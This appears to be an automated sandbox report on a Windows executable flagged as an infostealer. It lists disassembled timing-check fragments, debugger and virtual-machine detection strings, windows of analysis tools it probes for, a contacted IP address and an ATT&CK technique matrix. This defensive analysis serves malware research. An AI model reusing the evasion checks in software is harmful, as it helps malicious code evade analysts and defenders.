Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74311B3 second address: 74311B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74311B9 second address: 74311BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74311BD second address: 74311D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F1E5B09F4EDh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74311D1 second address: 74311D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74311D5 second address: 74311E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74311E5 second address: 743121E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1DED527557h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edx, dword ptr [ebp+08h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1DED527555h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743121E second address: 74312E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1DECBA0FE7h 0x00000009 jmp 00007F1DECBA0FE3h 0x0000000e popfd 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov eax, dword ptr [esi] 0x00000016 pushad 0x00000017 push edi 0x00000018 pushfd 0x00000019 jmp 00007F1DECBA0FDCh 0x0000001e sbb si, 6038h 0x00000023 jmp 00007F1DECBA0FDBh 0x00000028 popfd 0x00000029 pop esi 0x0000002a popad 0x0000002b mov dword ptr [edx], eax 0x0000002d jmp 00007F1DECBA0FDFh 0x00000032 mov eax, dword ptr [esi+04h] 0x00000035 jmp 00007F1DECBA0FE6h 0x0000003a mov dword ptr [edx+04h], eax 0x0000003d jmp 00007F1DECBA0FE0h 0x00000042 mov eax, dword ptr [esi+08h] 0x00000045 pushad 0x00000046 push ecx 0x00000047 mov edx, 351F7B10h 0x0000004c pop ebx 0x0000004d call 00007F1DECBA0FE6h 0x00000052 pushad 0x00000053 popad 0x00000054 pop esi 0x00000055 popad 0x00000056 mov dword ptr [edx+08h], eax 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F1DECBA0FDAh 0x00000060 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74312E7 second address: 74312FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1DED527551h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74312FE second address: 7431323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esi+0Ch] 0x0000000a pushad 0x0000000b mov dh, 9Ah 0x0000000d mov esi, 395F6A0Bh 0x00000012 popad 0x00000013 mov dword ptr [edx+0Ch], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F1DECBA0FDDh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7431323 second address: 7431328 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7431328 second address: 7431367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F1DECBA0FDDh 0x0000000a add esi, 0F847F06h 0x00000010 jmp 00007F1DECBA0FE1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [esi+10h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F1DECBA0FDDh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7431367 second address: 743138A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [edx+10h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1DED527554h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743138A second address: 743142B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 5819C020h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+14h] 0x0000000e jmp 00007F1DECBA0FDFh 0x00000013 mov dword ptr [edx+14h], eax 0x00000016 jmp 00007F1DECBA0FE6h 0x0000001b mov eax, dword ptr [esi+18h] 0x0000001e jmp 00007F1DECBA0FE0h 0x00000023 mov dword ptr [edx+18h], eax 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F1DECBA0FDDh 0x0000002d xor ecx, 7D5C1B36h 0x00000033 jmp 00007F1DECBA0FE1h 0x00000038 popfd 0x00000039 popad 0x0000003a mov eax, dword ptr [esi+1Ch] 0x0000003d jmp 00007F1DECBA0FDEh 0x00000042 mov dword ptr [edx+1Ch], eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F1DECBA0FE7h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7431501 second address: 743157A instructions: 0x00000000 rdtsc 0x00000002 mov cl, 68h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [edx+2Ch], ecx 0x0000000a jmp 00007F1DED527557h 0x0000000f mov ax, word ptr [esi+30h] 0x00000013 pushad 0x00000014 mov cl, 78h 0x00000016 pushfd 0x00000017 jmp 00007F1DED527551h 0x0000001c xor ax, B796h 0x00000021 jmp 00007F1DED527551h 0x00000026 popfd 0x00000027 popad 0x00000028 mov word ptr [edx+30h], ax 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F1DED52754Ch 0x00000033 add ax, 8FB8h 0x00000038 jmp 00007F1DED52754Bh 0x0000003d popfd 0x0000003e push eax 0x0000003f push edx 0x00000040 mov cl, B1h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743157A second address: 743159F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ax, word ptr [esi+32h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1DECBA0FE8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743159F second address: 74315CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, D1F4h 0x00000007 mov edx, 36FF1960h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov word ptr [edx+32h], ax 0x00000013 jmp 00007F1DED52754Fh 0x00000018 mov eax, dword ptr [esi+34h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ch, dh 0x00000020 mov edx, esi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74315CC second address: 74315E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 1825A64Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [edx+34h], eax 0x00000010 pushad 0x00000011 mov ax, di 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74315E3 second address: 7431605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, 9Eh 0x00000006 popad 0x00000007 popad 0x00000008 test ecx, 00000700h 0x0000000e pushad 0x0000000f mov bh, al 0x00000011 mov di, 11AAh 0x00000015 popad 0x00000016 jne 00007F1E5BA25664h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7431605 second address: 7431609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7431609 second address: 743160D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743160D second address: 7431613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7431613 second address: 7431693 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1DED52754Bh 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e or dword ptr [edx+38h], FFFFFFFFh 0x00000012 pushad 0x00000013 mov si, bx 0x00000016 mov cl, dh 0x00000018 popad 0x00000019 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F1DED527554h 0x00000024 or esi, 45433DF8h 0x0000002a jmp 00007F1DED52754Bh 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007F1DED527558h 0x00000036 adc si, 1858h 0x0000003b jmp 00007F1DED52754Bh 0x00000040 popfd 0x00000041 popad 0x00000042 or dword ptr [edx+40h], FFFFFFFFh 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7431693 second address: 7431697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7431697 second address: 74316B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527557h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74316B2 second address: 74316B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74316B8 second address: 74316BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7480BE4 second address: 7480BFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DECBA0FE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7480BFC second address: 7480C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7480C00 second address: 7480C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov esi, 66D2A503h 0x0000000f mov eax, 52508E5Fh 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F1DECBA0FE2h 0x0000001b mov ebp, esp 0x0000001d jmp 00007F1DECBA0FE0h 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movzx esi, dx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7420727 second address: 742072B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 742072B second address: 7420731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7420731 second address: 7420749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED52754Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ecx, edx 0x0000000f mov ax, di 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 73C002A second address: 73C007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, E18Ah 0x00000007 mov bh, 8Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F1DECBA0FDDh 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F1DECBA0FE3h 0x0000001c or ch, FFFFFF8Eh 0x0000001f jmp 00007F1DECBA0FE9h 0x00000024 popfd 0x00000025 mov dx, ax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 73C007D second address: 73C009F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED52754Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1DED52754Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 73C009F second address: 73C00A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 73C00A5 second address: 73C00C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1DED527552h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 73C05B7 second address: 73C05BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 73C05BF second address: 73C05DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a call 00007F1DED52754Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 73C0992 second address: 73C09F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1DECBA0FDFh 0x00000009 and eax, 1A38282Eh 0x0000000f jmp 00007F1DECBA0FE9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F1DECBA0FE0h 0x0000001b sbb esi, 487495A8h 0x00000021 jmp 00007F1DECBA0FDBh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a mov dword ptr [esp], ebp 0x0000002d pushad 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7410A52 second address: 7410A9F instructions: 0x00000000 rdtsc 0x00000002 call 00007F1DED52754Eh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F1DED52754Bh 0x00000010 and cx, 3C8Eh 0x00000015 jmp 00007F1DED527559h 0x0000001a popfd 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov edx, 3F1119EEh 0x00000026 movsx ebx, ax 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7410A9F second address: 7410AA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7410AA5 second address: 7410AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7410AA9 second address: 7410AC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1DECBA0FE1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7410AC7 second address: 7410ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7410ADC second address: 7410AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DECBA0FDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 73F001F second address: 73F0023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 73F0023 second address: 73F0029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 73F0029 second address: 73F002E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Special instruction interceptor: First address: EE17F5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Special instruction interceptor: First address: EE1751 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Special instruction interceptor: First address: 107C93E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Special instruction interceptor: First address: 10A678C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Special instruction interceptor: First address: 1107F26 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_0080255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,		0_2_0080255D
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_008029FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,		0_2_008029FF

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe

Code function: 0_2_0080255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,

0_2_0080255D

Source: sYPORwmgwQ.exe, sYPORwmgwQ.exe, 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: sYPORwmgwQ.exe, 00000000.00000003.2114120041.0000000001A64000.00000004.00000020.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000003.2113328655.0000000001A61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: sYPORwmgwQ.exe	Binary or memory string: Hyper-V RAW
Source: sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: sYPORwmgwQ.exe, 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: sYPORwmgwQ.exe, 00000000.00000003.2171502391.0000000001AC4000.00000004.00000020.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2174686702.0000000001AC9000.00000004.00000020.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000003.2171350709.0000000001AC3000.00000004.00000020.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000003.2171274595.0000000001AB6000.00000004.00000020.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000003.2171674581.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	File opened: NTICE
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	File opened: SICE
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Process queried: DebugPort	Jump to behavior

Source: sYPORwmgwQ.exe, sYPORwmgwQ.exe, 00000000.00000002.2173630606.000000000105E000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: wdqProgram Manager

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: sYPORwmgwQ.exe, 00000000.00000003.2082066041.00000000076B0000.00000004.00001000.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: procmon.exe
Source: sYPORwmgwQ.exe, 00000000.00000003.2082066041.00000000076B0000.00000004.00001000.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Infostealer behavior detected

Source: Signature Results

Signatures: Mutex created, HTTP post and idle behavior

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.5:49705 -> 81.29.149.125:80

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Process Injection	23 Virtualization/Sandbox Evasion	OS Credential Dumping	741 Security Software Discovery	1 Exploitation of Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	23 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	13 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
